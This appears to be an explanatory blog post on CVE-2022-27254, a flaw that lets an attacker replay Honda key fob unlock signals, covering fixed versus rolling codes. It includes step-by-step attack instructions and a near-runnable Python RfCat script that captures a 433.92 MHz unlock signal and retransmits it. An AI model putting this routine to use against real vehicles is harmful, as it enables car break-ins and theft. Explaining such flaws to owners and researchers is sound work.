Imagine you're leaving your car in the parking lot, locking it with your key fob, thinking it's safe. But what if someone could easily unlock your Honda Civic just by "listening" to your remote? That's exactly the problem exposed by CVE-2022-27254, a vulnerability found in certain Honda vehicles, including the 2018 Honda Civic.

Let's break down what happened, why it matters, and how attacks work in simple, clear terms.

What is CVE-2022-27254?

CVE-2022-27254 is a security vulnerability in the remote keyless entry system of certain Honda vehicles, discovered and made public in March 2022. This flaw lets attackers perform a replay attack—that is, capture the wireless signal sent by your key fob and replay it to unlock your car later. The car’s system basically trusts any properly formatted signal from the fob, even if it’s a repeat of a previous one.

This issue is very similar to CVE-2019-20626, which affected other Honda models.

How Does the Honda Civic Remote System Work?

When you press the key fob to unlock your Honda Civic, the key fob sends a Radio Frequency (RF) signal to the car. Normally, modern car remote systems use a feature called "rolling codes"—each key press sends a different code, so replaying an old one won't work. But the 2018 Honda Civic stays with the same code each time you unlock the car.

Car receives the code and, if valid, unlocks the doors.

In this vulnerability:  
The car accepts the same code over and over again. Anyone who captures this code from the air can unlock your car by replaying the same message.

Here's how an attacker could pull this off

1. Wait nearby when you use your key fob—outside your house, work, or the grocery store.

2. Capture the unlock signal as you press the button.  
The equipment will "listen" to the airwaves and record the code.

3. Later, when you’re gone, walk up to your car and use an RF transmitter to replay the captured code.

4. The car unlocks—the same as if you pressed your real key fob.

Simple Python Example (Pseudocode)

Below is a simple Python pseudocode to show how the attack logic might look using RF devices and a signal analysis library.  
(For legal reasons, don't use this for actual attacks—it's for education!)

from rflib import RfCat

# Capture phase
d = RfCat()
d.setFreq(433920000)  # Typical key fob RF frequency
d.setMdmModulation(MOD_ASK_OOK)

print("Listening for unlock signal...")
capture = d.RFrecv(timeout=10000)  # Wait 10 seconds
with open('unlock_signal.bin', 'wb') as f:
    f.write(capture)

print("Signal captured and saved.")

# Replay phase
with open('unlock_signal.bin', 'rb') as f:
    replay_code = f.read()

print("Replaying unlock signal...")
d.RFxmit(replay_code)


*Note: This is for educational/demonstration purposes only.*

Why Is This Possible?

Older or less-secure keyless systems used "fixed codes"—the same every time. Most modern fobs use "rolling codes" (codes that change each time, synced between the car and key). Some manufacturers, though, continued using the fixed code method in specific models or regions. Honda's 2018 Civic is one such case.

If a key fob replays the same code every time, it's basically an open invitation for a simple replay attack.

Original References and More Reading

- CVE-2022-27254 National Vulnerability Database
- CVE-2019-20626: Similar Honda fixed code issue
- Security Researcher’s original post on replay attacks

What Can You Do as an Owner?

- Don't leave valuables in your car. Since this attack can be performed quickly and quietly, hiding belongings or taking them with you is safer.

Final Thoughts

Most people assume their car’s remote system is secure, but vulnerabilities like CVE-2022-27254 show that sometimes the smallest details—like reusing the same code—can have big consequences. Manufacturers are slowly improving, but it’s important for everyone to understand how these attacks work and how to protect themselves.

If you own a 2018 Honda Civic (or similar model), stay alert and consider extra precautions.

Timeline

Published on: 03/23/2022 22:15:00 UTC
Last modified on: 03/31/2022 20:28:00 UTC